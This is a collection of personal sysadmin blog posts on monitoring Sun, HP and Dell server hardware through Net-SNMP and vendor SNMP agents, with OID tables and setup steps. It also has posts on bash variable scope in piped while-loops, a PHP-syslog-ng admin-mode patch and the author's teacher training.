Of course packaging all these changes into one big .PKG is the nicest way of ensuring that all required changes are made in one blow, so that's what I've done. Unfortunately I cannot share this package with you, since it contains quite a large amount of $CLIENT internal information. I may be tempted at another time to recreate a non-$CLIENT version of the package that can be used elsehwere.


Re-compiling Net-SNMP

The latest versions of Net-SNMP comes with experimental LM_Sensors support for Sun hardware. Oddly, I've found that you need to drop one version below the latest version to get it to work nicely with Solaris 8. So here's the steps to take...

  1. Download the source code for Net-SNMP version 5.2.3 from their website.
  2. Move the .TGZ to your build system and unpack it in your regular build location. Also, building Net-SNMP successfully requires OpenSSL 0.9.7g or higher, so make sure that it's installed on your build system.
  3. Run the configure script with the following options:

    --with-mib-modules="host disman/event-mib ucd-snmp/diskio smux agentx disman/event-mib ucd-snmp/lmSensors" --with-perl-module

  4. Run "make", "make test" and "make install" to complete the creation of Net-SNMP. If "make test" fails on every check, it is likely that your system is unable to find the requisite OpenSSL libraries. This may be solved by running:

    /usr/bin/crle -c /var/ld/ld.config -l /lib:/usr/lib:/usr/local/lib:/usr/local/ssl/lib

  5. After "make install" has finished all the Net-SNMP files have been installed on your build system. Naturally it's important to know which files to include in your package. To help you, I've created a list of the files that are installed.

Installing SUNWmasf and its components

PLEASE NOTE: SUNWmasf will currently (july of 2006) only get useful results on the following models: V210, V240, V250, V440, V1280, E2900, N210, N240, N440, N1280. On other systems you may have more luck using the LM_Sensors pieces of Net-SNMP. They have been tested to work on E450, V880 and 280R.

As I mentioned earlier Net-SNMP with LM_Sensors can only gather limited amounts of Sun specific information. That's besides the fact that it is also still an experimental feature. So we're going to need an alternative SNMP agent to gather more information for us. Enter the SUNWmasf package.

SUNWmasf and its components may be downloaded from the Sun Microsystems website. Either use this direct link (which may be subject to change), or go to www.sun.com/download and search for "Sun SNMP Management Agent".

You can opt to install SUNWmasf manually on each of your clients, but it would be much nicer to include it into your custom made package. To have a full list of all the files and symlinks that you should include, you can take a peek at the prototype file I made for the package. It includes all the files required for Net-SNMP.

Installation of the software couldn't be easier. Just run the following command, after extracting the .TAR.Z file that contains SUNWmasf.

pkgadd -d . SUNWescdl SUNWescfl SUNWeschl SUNWescnl SUNWescpl SUNWmasf SUNWmasfr


Configuring SUNWmasf

Go into /etc/opt/SUNWmasf/conf and replace the snmpd.conf file with the following:

rocommunity public

agentaddress 1161

agentuser daemon

agentgroup daemon


Configuring Net-SNMP

The configuration file for Net-SNMP is located in /usr/local/share/snmp. You will need to make a whole bunch of changes over here that I won't cover, like security ACLs, SNMP trap hosts and bunches of other stuff. However, you _will_ need to add the following lines to allow Net-SNMP to talk to SUNWmasf.

proxy -c public localhost:1161 .1.3.6.1.4.1.42

proxy -c public localhost:1161 .1.3.6.1.2.1.47


Starting the software

Since SUNWmasf relies upon Net-SNMP, it will need to be started after that piece of software. The prototype file I mentioned earlier already takes this into account, but if you're not going to use it just make sure that /etc/init.d/masfd gets called _after_ /etc/init.d/snmpd during the boot process.

Also, I've noticed that SUNWmasf will need about thirty seconds before it can be read using commands like snmpget and snmpwalk.


Reading values from the agents

As you may well know, SNMP is a tangly web of numerical identifiers. I will make a nice overview of the various useful OIDs that you can use for monitoring through both LM_Sensors and SUNWmasf. However, I will put these in a seperate document, since it falls outside the scope of this mini-howto.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Interesting SUNWmasf (Management Agent for Sun Fire) SNMP objects

2008-01-01 00:00:00

In my mini-howto about monitoring Sun specific SNMP objects through Net-SNMP I refered to a few interesting objects which could be read through SUNWmasf.

Unfortuntately I can currently only list details for two of the supported models, since I do not have test boxen for the other models. The following lists are only a small selection from all possible objects, that we found interesting. A full list of available options can be obtained by running:

snmpwalk -c public localhost .1.3.6.1.2.1.47.1.1.1.1.2

Details about the structure of the various MIBs can be found in other articles in the Sysadmin section of my website. Just browse through the menu on the left. Point is that the lists below only list the OID _within_ the specific sub-trees (for example: .1.3.6.1.2.1.47.1.1.1.1.2.46). As I said: details on actually _reading_ these values will be contained in another document.

The possible values for service indicators (enterprise.42.2.70.101.1.1.12.1.2.$OID) are:

1 = unknown, 2 = off, 3 = on, 4 = alternating

The possible values for the keyswitch (enterprise.42.2.70.101.1.1.9.1.1.$OID) are:

1 = unknown, 2 = stand-by, 3 = normal, 4 = locked, 5 = diag

Sun Fire V240

Object

Description

Unit

.21 .23 .25 and .27

HDD[0-3] Service required indicator

Integer

.39

SYSTEM Service required indicator

Integer

.33 and .36

PSU[0-1] Service required indicator

Integer

.69 and.70

CPU[0-1] Core temperature

Degrees

.71

SYSTEM Enclosure temperature

Degrees

.99 and .100

PSU[0-1] Over-temperature warning

Integer

.81 .82 and .83

SYSTEM Enclosure fan[0-2] tacho meter

Integer

.84 .85 .86 and .87

CPU[0-1] Fan[0-1] tacho meter

Integer

.91 and .92

PSU[0-1] Fan underspeed warning

Integer

.31 and .34

PSU[0-1] Active (power?)

Integer

Sun Fire V440

.28 .30 .32 and .34

HDD[0-3] Service Required indicator

Integer

.37 and .41

PSU[0-1] Service Required indicator

Integer

.46

SYSTEM Service Required indicator

Integer

.43

Keyswitch

Integer

.98 .100 .102 and .104

CPU[0-3] Core temperature

Degrees

.106

MOBO temperature

Degrees

.107

SCSI temperature

Degrees

.131 and .132

PSU[0-1] Predict fan fault

Integer

.121

PCIFAN tacho meter

Integer

.122 and .123

CPUFAN[0-1] tacho meter

Integer

.36 and .40

PSU[0-1] Power OK

Integer

.124 .125 .126 and .127

CPU[0-3] Power fault

Integer

.128

MOBO Power fault

Integer


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Interesting SNMP objects for LM_Sensors on Solaris

2008-01-01 00:00:00

In my mini-howto about monitoring Sun specific SNMP objects through Net-SNMP I refered to a few interesting objects which could be read through LM_Sensors.

Unfortuntately I can currently only list details for two of the supported models, since I do not have test boxen for the other models. The following lists are only a small selection from all possible objects, that we found interesting. A full list of available options can be obtained by running:

snmpwalk -c public -m ALL localhost .1.3.6.1.4.1.2021.13

Details about the structure of the various MIBs can be found in other articles in the Sysadmin section of my website. Just browse through the menu on the left. Point is that the lists below only list the OID _within_ the specific sub-trees (for example: .1.3.6.1.4.1.2021.13.16.5.1.2.9). As I said: details on actually _reading_ these values will be contained in another document.

Sun Fire V240

Object

Description

Unit

2.1.2.1 and .2

CPU[0-1] Core temperature

Integer *

2.1.2.3

SYSTEM Enclosure temperature

Integer *

5.1.2.2

SYSTEM Service required indicator

Integer

5.1.2.5

PSU[0-1] Service required indicator

Degrees

5.1.2.10 .12 .14 and .16

HDD[0-3] Service required indicator

Integer

5.1.2.18

Keyswitch

Integer

5.1.2.4 and .7

PSU[0-1] Activity (power?)

Integer

*: In order to get the real temperature, you will need to divide the integer contained within this variable by 65.526. For some odd reason Net-SNMP does not store the real temperature in degrees Centrigrade.

Sun Fire V440

2.1.2.1 .2 .3 and .4

CPU[0-3] Core temperature

Integer *

2.1.2.5 .6 .7 and .8

CPU[0-3] Ambient temperature

Integer *

2.1.2.9

SCSI temperature

Integer *

.10

MOBO temperature

Integer *

.98 .100 .102 and .104

CPU[0-3] Core temperature

Degrees

.106

MOBO temperature

Degrees

.107

SCSI temperature

Degrees

5.1.2.2

SYSTEM Service required indicator

Integer

5.1.2.6 and .10

PSU[0-1] Service required indicator

Integer

5.1.2.12 .14 .16 and .18

HDD[0-3] Service required indicator

Integer

5.1.2.20

Keyswitch

Integer

5.1.2.4 and .8

PSU[0-1] Power OK

Integer

*: In order to get the real temperature, you will need to divide the integer contained within this variable by 65.526. For some odd reason Net-SNMP does not store the real temperature in degrees Centrigrade.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Reading from Solaris SNMP agents

2008-01-01 00:00:00

I have to admit that figuring out how all the parts of SNMP on Sun stick together took me a little while. Just like when I was learning Nagios it took me about a week of mucking about to gain clarity. Now that I've figured it out, I thought I'd share it with you...

First off, everything I will describe over here depends on the availability of two pieces of software on your clients: Net-SNMP and SUNWmasf. See the article on combining the two for further details on installing and configuring this software.

We should begin by verifying that you can read from each of the important pieces of the SNMP tree. You can verify this by running the following three commands on your client system. Each should return a long list of names, numbers and values. Don't worry if it doesn't make sense yet.

snmpwalk -c public localhost .1.3.6.1.2.1.47

snmpwalk -c public localhost .1.3.6.1.4.1.42

snmpwalk -c public -m ALL localhost .1.3.6.1.4.1.2021.13

Incidentally you should also be able to access the same parts of the SNMP tree remotely (from your Nagios server, for example).

snmpwalk -c public $remote_client .1.3.6.1.2.1.47

snmpwalk -c public $remote_client .1.3.6.1.4.1.42

snmpwalk -c public -m ALL $remote_client .1.3.6.1.4.1.2021.13

Please keep in mind that you should replace the word "public" in all the examples with the community string that you've chosen for your SNMP agents. It could very well be something other than "public".


Which witch is witch?

Now that we've made sure that you can actually talk to your SNMP agent, it's time to figure out which components you want to find out about. The easy way to find out all components that are available to you is by running the following command.

snmpwalk -c public localhost .1.3.6.1.2.1.47.1.1.1.1.2

Let me explain what the output of this command really means... The SNMP sub-tree MIB-2.1.1.1.1 contains descriptive information of system-specific SNMP objects. Each object has a sub-object in the following sub-trees (each number follows after MIB-2.1.1.1.1).

Sub-OID

Description

Sub-OID

Description

.1

entPhysicalIndex

.9

entPhysicalFirmwareRev

.2

entPhysicalDescr

.10

entPhysicalSoftwareRev

.3

entPhysicalVendorType

.11

entPhysicalSerialNum

.4

entPhysicalContainedIn

.12

entPhysicalMfgName

.5

entPhysicalClass

.13

entPhysicalModelName

.6

entPhysicalParentRelPos

.14

entPhysicalAlias

.7

entPhysicalName

.15

entPhysicalAssetID

.8

entPhysicalHardwareRev

.16

entPhysicalIsFRU

In this case all the sub-objects under .2 contain descriptions of the various components that are human readable. What you need to do now is go through the complete list of descriptions to pick those elements that you want to access remotely through SNMP. You will see that each entry has a number behind the .2. Each of these numbers is the unique component identifier within the system, meaning that we are lucky enough to have the same identifier within other parts of the SNMP tree.


An example

$ snmpwalk -c public localhost .1.3.6.1.2.1.47.1.1.1.1.2 | grep Core

SNMPv2-SMI::mib-2.47.1.1.1.1.2.98 = STRING: "CPU 0 Core Temperature Monitor"

SNMPv2-SMI::mib-2.47.1.1.1.1.2.100 = STRING: "CPU 1 Core Temperature Monitor"

SNMPv2-SMI::mib-2.47.1.1.1.1.2.102 = STRING: "CPU 2 Core Temperature Monitor"

SNMPv2-SMI::mib-2.47.1.1.1.1.2.104 = STRING: "CPU 3 Core Temperature Monitor"

$ snmpwalk -c public localhost .1.3.6.1.2.1.47.1.1.1.1 | grep "\.98 ="

SNMPv2-SMI::mib-2.47.1.1.1.1.2.98 = STRING: "CPU 0 Core Temperature Monitor"

SNMPv2-SMI::mib-2.47.1.1.1.1.3.98 = OID: SNMPv2-SMI::zeroDotZero

SNMPv2-SMI::mib-2.47.1.1.1.1.4.98 = INTEGER: 94

SNMPv2-SMI::mib-2.47.1.1.1.1.5.98 = INTEGER: 8

SNMPv2-SMI::mib-2.47.1.1.1.1.6.98 = INTEGER: -1

SNMPv2-SMI::mib-2.47.1.1.1.1.7.98 = STRING: "040349/adbs04:CH/C0/P0/T_CORE"

SNMPv2-SMI::mib-2.47.1.1.1.1.8.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.9.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.10.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.11.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.12.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.13.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.14.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.15.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.16.98 = INTEGER: 2


Getting some useful data

Aside from the fact that the sub-OID we have found for our object is used in other parts of the tree, there's another parameter that makes its return. The character string in .7 is reused in the SUN MIB as well, as you will see in a moment.

Let's see what happens when we take our sub-OID .98 to the SUN MIB tree...

$ snmpwalk -c public localhost .1.3.6.1.4.1.42.2.70.101.1.1 | grep "\.98 ="

SNMPv2-SMI::enterprises.42.2.70.101.1.1.2.1.1.98 = INTEGER: 2

SNMPv2-SMI::enterprises.42.2.70.101.1.1.2.1.2.98 = INTEGER: 2

SNMPv2-SMI::enterprises.42.2.70.101.1.1.2.1.3.98 = INTEGER: 7

SNMPv2-SMI::enterprises.42.2.70.101.1.1.2.1.4.98 = INTEGER: 2

SNMPv2-SMI::enterprises.42.2.70.101.1.1.2.1.5.98 = STRING: "040349/adbs04:CH/C0/P0"

SNMPv2-SMI::enterprises.42.2.70.101.1.1.6.1.1.98 = INTEGER: 2

SNMPv2-SMI::enterprises.42.2.70.101.1.1.6.1.2.98 = INTEGER: 3

SNMPv2-SMI::enterprises.42.2.70.101.1.1.6.1.3.98 = Gauge32: 60000

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.1.98 = INTEGER: 3

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.2.98 = INTEGER: 0

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.3.98 = INTEGER: 1

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.4.98 = INTEGER: 41

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.5.98 = INTEGER: 0

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.6.98 = INTEGER: 0

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.7.98 = INTEGER: 0

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.8.98 = INTEGER: 0

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.9.98 = INTEGER: 97

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.10.98 = INTEGER: -10

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.11.98 = INTEGER: 102

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.12.98 = INTEGER: -20

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.13.98 = INTEGER: 120

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.14.98 = Gauge32: 0

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.15.98 = Hex-STRING: FC

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.16.98 = INTEGER: 1

Take a look at 2.1.5.98... Looks familiar? At least now you're sure that you're reading the right sub-object :) The list in the example above looks quite complicated, but there's a little help in the shape of a .PDF I once made. This .PDF shows the basic structure of the objects inside enterprises.42.2.70.101.1.1.

You should immediately notice though that the returns of the command are divided into three groups: ...101.1.1.2, ...101.1.1.6 and ...101.1.1.8. Matching these groups up to the .PDF you'll see that these groups are respectively sunPlatEquipmentTable (which is an expansion on the information from MIB-2), sunPlatSensorTable (which contains a description of the sensor in question) and sunPlatNumericSensorTable (which contains all kinds of real-life values pertaining to the sensor).

In this case the most interesting sub-OID is enterprises.42.2.70.101.1.1.8.1.4.98, sunPlatNumericSensorCurrent, which obviously contains the current value of the sensor readings. Putting things into perspective this means that the core temperature of CPU0 at the time of the snmpwalk was 41 degrees centigrade.


Going on from there

So... Now you know how to find out the following things:

You can now do loads of things! For example, you can use your monitoring software to verify that certain values don't exceed a set limit. You wouldn't want your CPUs to get hotter than 65 degrees now, do you?


kilala.nl tags: , , , ,

View or add comments (curr. 2)

A closer look at SUN-PLATFORM-MIB

2008-01-01 00:00:00

For some reason unknown to me Sun has always kept their MIB file rather closed and hard to find. There's no place you can actually download the file. You will have to extract the file from the SUNWmasf package if you want to take a look at it.

To help us sysadmins out I've published the file over here. I do not claim ownership of the file in any way. Sun has the sole copyright of the file. I just put it here, so people can easily read through the file.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Combining net-SNMP with Dell Open Manage and HP Insight Manager

2008-01-01 00:00:00

Monitoring Dell and HP systems through SNMP is as big a puzzle as using SNMP on Sun Microsystems' boxen. Luckily I've come a long way into figuring out how to use Net-SNMP together with HP's SIM and Dell's OpenManage.

Just like with our Solaris boxen, we want to use the Net-SNMP daemon as the main daemon on our Linux systems. At $CLIENT we use Red Hat ES3 on a great variety of Dell and HP hardware. And as was the case with SUNWmasf on Solaris, we're going to need both Dell's and HP's custom SNMP agents to monitor out hardware-specific SNMP objects. Enter SIM and OpenManage. In the next few paragraphs I'll tell you all about installing and configuring the whole deal.

Naturally it would be great if you could package all of these files into one nice .RPM, since that'll make the whole installation process a snap. Especially if you want to roll it out across hundreds of servers. I'll be making such a package for $CLIENT, but unfortunately I cannot distribute it (which is logical, what with all the proprietary info that goes into the package). Maybe, some day I'll make a generic .RPM which you guys can use.


Installing HP SIM and its components.

Just like everyone else HP also chooses to hide the installer for their SNMP agent quite deeply into their website. You will need to go to their download site and browse to the software section for your model of server. Once there you choose "Download drivers and software" and you pick your Linux flavour (in our case RHEL3). From there go to "Software - Systems management" where you can finally choose "A Collection of SNMP Protocol Tools from Net-SNMP for $YOUR_FLAVOUR". *phew* To help you get there, here's the direct link to the RHES3 version of the package.

As the file name (net-snmp-cmaX-5.1.2) suggests, this package is a modified version of the net-SNMP daemon which has added support for a whole bunch of Compaq and HP stuff. But as you can see the version of net-SNMP used is way behind today's standards, so it's wisest to use this daemon while proxied through a more current version of net-SNMP. The crappy thing though is that HP's package installs their net-SNMP in exactly the same location as our own net-SNMP. Don't worry, we'll get to that.

The download page doesn't make this immediately clear, but you'll need to download five (or six if you want the source) files. For your convenience, HP has decided to put all files into a pull-down menu, with one "Download" button. Yes, very handy indeed. =_= Another neat thing is that, for some reason, the combination Safari+Realplayer decides that -they- need to open the .RPM file that's loaded. Very odd and I've never encountered this before with other RPMs.

Because we're going to use two versions of net-SNMP that use the same locations on your hard drive, we're going to have to fiddle around a bit.

First copy these two RPMs to your system: net-snmp-cmaX and net-snmp-cmaX-libs. Install them using RPM, starting with libs and ending with the basic package. Now do the following.

$ cd /usr/sbin
$ sudo mv snmpd HPsnmpd
$ sudo mv snmptrapd HPsnmptrapd
$ cd /etc
$ sudo ln -s ./snmpd.conf ./HPsnmdp.conf
$ cd /etc/rc.d/init.d
$ sudo mv snmpd HPsnmpd
$ sudo mv snmptrapd HPsnmptrapd
$ cd /etc/logrotate.d
$ sudo mv snmpd HPsnmpd

You've now made sure that all parts that are required for the HP SNMP agent are safe from being overwritten by the "real" net-SNMP.

You can now install net-SNMP using the instruction laid out in the following paragraph.


Re-compiling Net-SNMP

PLEASE NOTE: If you're going to use HP SIM, please install that -first- before proceeding. See below for details.

Basically, recompiling Net-SNMP for your Linux install follows the same procedure as the recompilation on Solaris.

  1. Download the source code for Net-SNMP version 5.2.3 (or a newer version, if you wish) from their website.
  2. Move the .TGZ to your build system and unpack it in your regular build location. Also, building Net-SNMP successfully requires OpenSSL 0.9.7g or higher, so make sure that it's installed on your build system.
  3. Run the configure script with the following options:

    --with-mib-modules="host disman/event-mib ucd-snmp/diskio smux agentx disman/event-mib ucd-snmp/lmSensors" --with-perl-module

  4. Run "make", "make test" and "make install" to complete the creation of Net-SNMP.

  5. After "make install" has finished all the Net-SNMP files have been installed on your build system. Naturally it's important to know which files to include in your package. I will make a full listing of all files RSN(tm)..

Installing Dell OpenManage and its components.

I had a hard time finding the installer files for Dell OM on Dell's download site, util I finally figured out how their "logic" works. :D You can get Dell OM 4.5 for Linux through this direct link (which can be changed at any time by Dell), or you can search their downloads page using the term "openmanage server agent". Adding the key word "linux" seems to confuse it though, so you're going to have to manually search through the list.

Unfortunately I never did get around to using Dell OpenManage, so I cannot give you the installation instructions ;_;


Configuring HP-SIM

The configuration file for HP's version of net-SNMP is stored in /etc/snmp, unlike the version that'll be used by our own net-SNMP. Edit HP's config file and remove all the current content. Replace it with the following:

rocommunity public 0.0.0.0 agentaddress 1162 pass .1.3.6.1.4.1.4413.4.1 /usr/bin/ucd5820stat

You will not have to make any further changes. The init-script and such can remain unchanged.


Configuring Dell OpenManage

Again, unfortunately I cannot give you instructions on working with OpenManage since I ran out of time.

rocommunity public 0.0.0.0 agentaddress 1163


Configuring Net-SNMP

The configuration file for Net-SNMP is located in /usr/local/share/snmp. You will need to make a whole bunch of changes over here that I won't cover, like security ACLs, SNMP trap hosts and bunches of other stuff. However, you _will_ need to add the following lines to allow Net-SNMP to talk to HP SIM and/or OpenManage.

# Pass requests to HP SIM

proxy -c public localhost:1162 .1.3.6.1.4.1.232

# Pass requests to Dell OpenManage

proxy -c public localhost:1163 .1.3.6.1.2.1.674


Starting the software

Make sure that you start Net-SNMP before OpenManage or SIM. These sub-agents rely on Net-SNMP to be running, so that one needs to go first. Take care of this order using the RC scripts of your particular Linux flavour.



kilala.nl tags: , , ,

View or add comments (curr. 0)

Interesting HP SIM (Insight Manager) SNMP objects

2008-01-01 00:00:00

In my mini-howto about monitoring HP and Dell specific SNMP objects through Net-SNMP I refered to a few interesting objects which could be read through their repsective SNMP agents. This page covers the interesting objects for HP Compaq systems.

Right now I've only got a very limited amount of different models to test all this stuff on, so bear with me :) The following lists are only a small selection from all possible objects, that we found interesting. A full list of available options can be obtained by running:

snmpwalk -c public localhost .1.3.6.1.4.1.232

I've tried my best at making the more interesting parts of the HP and Dell MIBs legible. The results can be found in the PDF, in the menu on the left. But once again, these lists are only a small subset of the complete MIB for both vendors. You won't know all that's available to you unless you start digging through the flat .TXT files yourself. Unlike Sun, HP and Dell -do- publish their MIB files freely, so you'll have no trouble finding them on the web.

I've also expanded on the HP SIM MIB a little in a PDF document. Get it over here.


On the monitoring of disks.

Unfortunately, HP and Compaq have made it impossible to monitor hard disk statuses without add-on software. The plain vanilla SNMP agent has no way of filling the relevant objects. Instead it requires the CPQarrayd add-on.

If you do choose to install this piece of software, you can find all the objects regarding -internal- drives under OID .1.3.6.1.4.1.232.3.2.5.2 (cpqDaPhyDrvErrTable). Refer to CPQIDA.MIB.txt for all relevant details and a full listing of the appropriate OIDs.

Currently I have no way of making sure, but I assume that the alert message for HDD[0-7] can be found in .1.3.6.1.4.1.232.3.2.5.2.1.15.[0-7]. Any value above 0 is indicates a failure.


Basic Object Identifiers

All object IDs below fit under .1.3.6.1.4.1.232. These objects should be usable on every HP system in the DL/ML rangen, although I have only tested the on DL380, DL385, DL580 and ML570.

Object

Description

Values

.1.2.2.1.1.6.OID

CPU[0-3] status

1/2 = ok, 3 = warn, 4 = crit

.3.2.2.1.1.6.OID

HDD controler

1/2 = ok, 3 = warn, 4 = crit

.3.2.3.1.1.11.OID

LDD[0-X] status

1/2 = ok, 3 = warn, 4 = crit

.3.2.4.1.1.6.OID

Hot spare HDD status

>2 =crit

.3.2.5.1.1.37.OID

HDD[0-X] status

1/2 = ok, 3 = warn, 4 = crit

.5.2.2.1.1.12.OID

SCSI controler status

1/2 = ok, 3 = warn, 4 = crit

.5.2.3.1.1.8.OID

SCSI LDD[0-X] status

1/2 = ok, 3 = warn, 4 = crit

.5.2.4.1.1.26.OID

SCSI HDD[0-x] status

1/2 = ok, 3 = warn, 4 = crit

.6.2.6.7.1.9.OID

Fan status

1/2 = ok, 3 = warn, 4 = crit

.6.2.6.8.1.4.1

CPU0 temperature

Contains current temperature

.6.2.6.8.1.4.4

CPU1 temperature

Contains current temperature

.6.2.6.8.1.4.5

PSU temperature

Contains current temperature

.6.2.9.3.1.4.0.OID

PSU[0-X] status

1/2 = ok, 3 = warn, 4 = crit

.14.2.2.1.1.5.OID

IDE HDD[0-X] status

1/2 = ok, 3 = warn, 4 = crit


Fan and sensor placement

As I already said, most of the OIDs from the tables above can be used to monitor vanilla HP systems (with the exceptions of the hard disks). The biggest difference lies in the placement of certain fans and sensors. The table below outlines the various locations, depending on the model.

Each system contains multiple fans and temperature sensors and will thus have multiple instances of these objects in its SNMP tree. The locations for each of these instances can be read from .6.2.6.7.1.3.OID (fans) and 6.2.6.8.1.3.OID (temperature sensor). The $OID part of these numeric sequences are always .1.1, .1.2, .1.3, .1.4 and so on.

Fan

DL380

DL385

DL580

ML570

.1.1

CPU

CPU

System

?

.1.2

CPU

CPU

System

?

.1.3

IO Board

IO Board

System

?

.1.4

IO Board

IO Board

System

?

.1.5

CPU

CPU

IO Board

?

.1.6

CPU

CPU

IO Board

?

.1.7

PSU

PSU

-

?

.1.8

PSU

PSU

-

?

Sensor

DL380

DL385

DL580

ML570

.1.1

CPU

CPU

CPU

?

.1.2

CPU

IO Board

CPU

?

.1.3

IO Board

CPU

CPU

?

.1.4

CPU

CPU

CPU

?

.1.5

PSU

PSU

IO Board

?

.1.6

-

-

Ambient

?

.1.7

-

-

System

?



kilala.nl tags: , , ,

View or add comments (curr. 0)

SANE 2006 conference notes

2008-01-01 00:00:00

In May of 2006 I attended the SANE 2006 conference. While there I took a lot of notes at various courses and panels. All my notes can be found below, as PDF documents.


kilala.nl tags: , ,

View or add comments (curr. 0)

SAN data migration scripts

2008-01-01 00:00:00

It's been way too long since I used these scripts. I believe they stem from 2003.

I'll need to write some more about them later. For now, know that I used these scripts to prepare for data migrations between local systems and SAN boxen. We moved from local to EMC2, then we moved from EMC2 to HP XP-1024.


kilala.nl tags: , , ,

View or add comments (curr. 0)

PHP-Syslog update: admin mode

2008-01-01 00:00:00

At $CLIENT I've built a centralised logging environment based on Syslog-ng, combined with MySQL. To make any useful from all the data going into the database we use PHP-syslog-ng. However, I've found a bit of a flaw with that software: any account you create has the ability to add, remove or change other accounts... Which kinda makes things insecure.

So yesterday was spent teaching myself PHP and MySQL to such a degree that I'd be able to modify the guy's source code. In the end I managed to bolt on some sort of "admin-mode" which allows you to set an "admin" flag on certain user accounts (thus giving them the capabilities mentioned above).

The updated PHP files can be found in the TAR-ball in the menu of the Sysadmin section. The only thing you'll need to do to make things work is to either:

  1. Re-create your databases using the dbsetup.sql script.
  2. Add the "admin" column to the "users" table using the following command. ALTER TABLE users ADD COLUMN baka BOOLEAN;

The update is available as a .TAR file. Get it over here.


kilala.nl tags: , ,

View or add comments (curr. 0)

The scope of variables in shell scripts

2008-01-01 00:00:00

Just today I ran into something shiny that peeked my interest. A shell script I'd written in Bash didn't work like I expected it to, with regards to the scope of a variable. I thought the incident was interesting enough to report, although I won't go into the whole scoping story too deeply.

What is basically boils down to is that there was a difference in the way two shells handle a certain situation. A difference that I didn't expect to be there. Not that exciting, but still very educational.


Scope?

Yeah. In most programming languages variables have a certain range within your program, within which they can be used. Some variables only exist within one subroutine, while other exist across the whole program or even across multiple parts of the whole.

In shell scripting things aren't that complicated, luckily. In most cases a variable that's set in one part of the script can be used in every other part of the script. There are some notable exceptions, one of which I ran into today without realising it.


The real code

My situation:

I have a command that outputs a number of lines, some of which I need. The lines that I'm interested in consist of various fields, two of which I need as variables. Depending on the value of one of these variables, a counter needs to be incremented.

I guess that sounds kinda complicated, so here's the real code snippet:

function check_transport_paths

{

TOTAL=`scstat -W | grep "Transport path:" | wc -l`

let COUNT=0



scstat -W | grep "Transport path:" | awk '{print $3" "$6}' | while read PATH STATUS

do

if [ $STATUS == "online" ]

then

let COUNT=$COUNT+1

fi

done



if [ $COUNT -lt 1 ]

then

echo "NOK - No transport paths online."

exit $STATE_CRITICAL

elif [ $COUNT -lt $TOTAL ]

then

echo "NOK - One or more transport paths offline."

exit $STATE_WARNING

fi

}


Where it goes wrong

While testing my script, I found out that $COUNT would never retain the value it gained in the while-loop. This of course led to the script always failing the check. After some fiddling about, I found out that the problem lay in the use of the while loop: it was being used that the end of a pipe.

To illustrate, the following -does- work.

let COUNT=0

while read i

do

let COUNT=$COUNT+$i

echo $COUNT

done



echo "Total is $COUNT."

This leads to the following output.

$ ./baka.sh

1

1

2

3

3

6

4

10

^D

Total is 10.

However, if I were to create a script called neko.sh that outputs the numbers one through four on seperate lines, which is then used in baka.sh... well... it doesn't work :D Regardez!

let COUNT=0

./neko.sh | while read i

do

let COUNT=$COUNT+$i

echo $COUNT

done



echo "Total is $COUNT."

This gives the following output

1

3

6

10

Total is 0.

Conclusions

After discussing the matter with two of my colleagues (one of them as puzzled as I was, and the other knowing what was going wrong) we came to the following conclusions.

This conclusion is supported by an example in the "Advanced Bash-scripting guide" by Mendel Cooper. In the following example an additional comment is made about the scoping of variables with redirected while loops. The comment warns that older shells branch a redirected while into a sub-shell, but also tells that Bash and Ksh this properly.

I guess our version of Bash is too old :3

Work around

A word of thanks

I'd like to thank my colleagues Dennis Roos and Tom Scholten for spending a spare hour with me, hacking at this problem. And I'd like to thank Ondrej Jombik for pointing out the fact that this article didn't make my conclusions very clear in its original version.


kilala.nl tags: , , ,

View or add comments (curr. 28)

Speaking of educators...

2007-12-11 20:17:00

As you can imagine, this whole deal about the New Learning has the whole country in uproar. Teachers, educators, students, parents, scientists, educationists and simple bystanders: everyone has an opinion, well-informed or otherwise.

And of course, as things go with conflict, most of the people are only willing to see things black or white. "You're with us, or against us!" Stuff like that. To aid each party in their cause, public fora have appeared on the Internet: the opponents seem to gather at Beter Onderwijs Nederland, while the proponents assemble at Natuurlijk Leren.

So far I haven't joined any discussions at the latter, opting instead to visit the BON site. This is in part due to the fact that I like their website design a lot better (it's more transparent). BON's opponents typecast them as grouchy, old men who are completely stuck in their ways and who disparage any ideas that are not their own. And unfortunately they're not doing much to break down those stereotypes.

So far the questions and opinions I have voiced (which partially contradict their own) have been met with derision and hidden insults. Which is a shame, because I think there's a lot to learn from healthy discussions. I'm still studying to become a teacher, so I'll grasp any straw that may include some new information.

Of course, I have no desire whatsoever to have my ambitions quashed by snide remarks. I'll try and maintain a level head in my forum discussions. Developing a thicker skin may actually help protect me from students later on. ^_^ Of course, if things keep going like they are I'll just leave BON again. Practicing my debating skills is one thing, letting people sap at my enthusiasm is something else entirely.


kilala.nl tags: , ,

View or add comments (curr. 0)

A day off? Schoolwork it is!

2007-12-11 20:05:00

I'd taken the day off from work today, in order to work on a school project. This project has each group looking into the so-called New Learning (which really isn't new, but just different), in hopes that we learn something about recent education reforms.

